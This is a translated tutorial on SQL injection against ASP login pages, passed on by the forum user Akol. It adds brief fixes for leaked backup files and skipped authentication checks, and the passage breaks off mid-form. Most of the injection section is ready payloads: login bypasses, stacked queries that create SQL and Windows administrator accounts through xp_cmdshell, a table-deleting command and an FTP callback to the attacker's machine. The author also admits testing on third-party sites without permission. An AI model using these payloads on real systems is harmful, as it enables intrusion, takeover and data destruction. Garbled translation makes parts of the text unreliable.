SQL injection attacks and Prevention

Author: Ako from: Coke heaven

Akol: At the request of netizens, I published an SQL injection tutorial written in. The injection section has been talked about too much, so you don't have to read it, other techniques and protection methods in this article are worth looking.
========================================================== ========================================================== ================================
I have never studied asp or php programming in a system, or access, SQL Server, mysql, or other databases in a system. So I am not a programmer, although I often do something similar to a programmer.
Because we need to build our own site, three revisions have been made, and thousands of lines of programs have been written. In addition, some problems have also been found in the testing of forums, message boards, and article publishing systems, we will discuss with you now.
At the time of writing this article, in addition to setting up an asp + access and asp + SQL server test environment on the local machine, I am sorry for some tests on the websites of x× security website, x× city talent network, and x× network company! I chose am ~ The test started at is limited to search operations, so it is certain that there is almost no impact on your site. I will exchange a little more traffic for your security report within one hour, I don't think it's too bad, huh, huh!
1. bak file leakage asp source code
Many editing tools, such as Editplus and UltraEdit, automatically back up a. bak file when saving files by default. For example, create or edit config. asp file, the editor will automatically generate a config. asp. if the bak file is not deleted, attackers can use http: // www. ***. com/config. asp. bak to download the asp source program.
As you can imagine, if your source program is downloaded, the risk of being attacked is undoubtedly high. For configuration files, user name, password, database name/location ......
Solution: either disable the automatic backup function of the editor or delete all. bak files during upload.
2. Authentication Bypass
In general, many pages of a website can be accessed only after authentication is passed. On these pages, the user identity must be verified again, but many programmers often ignore this. If attackers know the path and file name of these pages, they can bypass authentication and directly access the page. For example, you must log in through the login. asp page and go to the manage. asp page only after authentication. Attackers can directly access the management interface through http: // www. ***. com/manage. asp.
Solution: confirm the identity at the beginning of these pages. For example, after the authentication is passed, pass a session ("login") = "OK" and add it at the beginning of manage. asp
The following is the program code:

If session ("login") <> "OK" then
Response. redirect "login. asp"
End if
 

The above two points are all about the basic issues of programming. The focus of this article will be discussed below: SQL injection attacks and prevention.
3. asp program Database Password Verification Vulnerability
First, for the request object, we know that if you use the get method to pass data in the form, you should use the QueryString set to retrieve the form data. When you use the post method to pass data, you should use the Form set to retrieve Form data. For convenience, more programmers simply omit the Set Name and use request ("data") to retrieve data. It seems simple, in fact inefficient, and error-prone. By default, asp searches for a set in the order of QueryString, Form, Cookie, and Serverariable. When the first matching variable is found, it is considered to be the member you want to access. Therefore, we recommend that you do not use this method. After you finish the problem, let's proceed to the subject.
First, let's look at the login. asp file.
The following is the program code:

......
<Form action = "verify. asp" method = "post" name = "login">
Username <input type = text name = name value = "" maxlength = "20">
Password <input type = password name = pwd value = "" maxlength = "20">
<Input type = submit name = bt value = "OK">
<Input type = reset name = bt value = "reset">
</Form>
......
 

Let's take a look at the verify. asp file.
The following is the program code:

......
Dim rs, SQL
Dim name, pwd
Name = request. form ("name ")
Pwd = request. form ("pwd ")

If name = "" or pwd = "" then
Response. redirect "login. asp"
End if
......
About Identity Authentication
SQL = "select * from user where name =" & name & "and pwd =" & pwd &""
......
 

Do not think that no one will write like this. I have seen many people. If you believe me, see what attackers can do:
(1) enter admin or 1 = 1 in the user name and 11 in the password area ]. Note: The content is only in. See what SQL will become:
The following is the program code:

SQL = select * from user where name = admin or 1 = 1 and pwd = 11

We know that or is a logical operator. When multiple conditions are judged, as long as one condition is true, the equation returns true, and the and following conditions are no longer judged, that is to say, we have bypassed password verification and can log on to the system as long as we know the user name.
(2) You can also enter admin -- In the username and 11 in the password area ]. Let's look at SQL:
The following is the program code:

SQL = select * from user where name = admin -- and pasword = 11

Similarly, the password verification is commented out through the connector, which is invalid for the access database.
(3) If you can comment out the subsequent verification via a connector, it will be more interesting to see what we can do:
A. Enter "admin; exec master. dbo. sp_addlogin Cool; --" at the user name to add an SQL user.
B. Enter [admin; exec master. dbo. sp_password null, 123456, Cool; --] at the user name location, and set the Cool password to 123456.
C. Enter [admin; exec master. dbo. sp_addsrvrolemember Cool, sysadmin; --] at the user name location to grant the System Administrator permission to Cool.
D. Enter "admin; exec master. dbo. xp_mongoshell net user Cool 123456/workstations" at the user name location :*
/Times: all/passwordchg: yes/passwordreq: yes/active: yes/add; --]: add a Cool account with a password of 123456 to the system and set related properties, for the net user command, refer to here.
E. Enter admin; exec master. dbo. xp_mongoshell net localgroup administrators Cool/add; -- In the username field to add cool users to the Administrator group.
I think it's terrible now. Of course, I haven't finished it yet. To achieve this, you must use the sa or system administrator permission on the site to connect to the database. You don't need to think about the common virtual space, unless the Administrator is SB. However, it is hard to say that websites are placed on their own servers. I have seen N websites.
If it is not sa, then nothing can be done, of course not! We just cannot get too high permissions to control the SQL database and system, but we still have full management permissions for this database. Let's see what we can do:
A. Enter admin; delete user; --. Once the table name is user, all records in the user table will be deleted. It's tough! You must never do this!
B. Enter [admin; insert into user (name, pwd) values (cool, 123456); --] to add a user to the user table, the premise is that the table name and field name must be correct.
C. Enter [admin; update news set pwd = 123456 where name = admin; --] to change the admin password, provided that the table name and field name are correct.
For more attack content, refer to SQL syntax.
It seems that sa is still depressing. Of course, we also have some simple methods to determine whether the website uses sa to connect to the database.
A. Execute nc-l-p 21 in cmd to listen to port 21 of the Local Machine. Of course, you can also use fire wall or something.
B. Enter [admin; exec master. dbo. xp_cmdshell ftp *. *. *. *]. * indicates your IP address. If a connection is found, you can determine that the sa is used and obtain the IP address of the website database, because some websites use web and SQL on different servers. If there is no connection, the website uses non-sa accounts.
Some friends may have seen that if the website uses sa, we can initiate a connection from the internal server through the page, construct an ftp script, or use tftp to upload files, even if there is a fire wall.
Some may say that the maximum length in the form is 20, and you cannot enter that much! It's okay, but it's hard for us.
Method 1:
A. Open the website page http: \ www. ***. comlogin. asp, view the source file, and submit the form part.
The following is the program code:

<Form action = "verify. asp" method = "post" name = "login">
Username <input type = text name = name value = "" maxlength = "20">
Password <input type = password name = pwd value = "" maxlength = "20">
<Input type = submit name = bt value = "OK">
<Input type = reset name = bt value = "reset">
</Form>

Stored in login.htm
B. Modify the action to http: \ www. ***. comverify. asp, that is:
The following is the program code:

<Form action = "http: \ www. ***. comverify. asp" method = "post" name = "login">
Username <input type = text name = name value = "" maxlength = "20">
Password <input type = password name = pwd value = "" maxlength = "20">
<In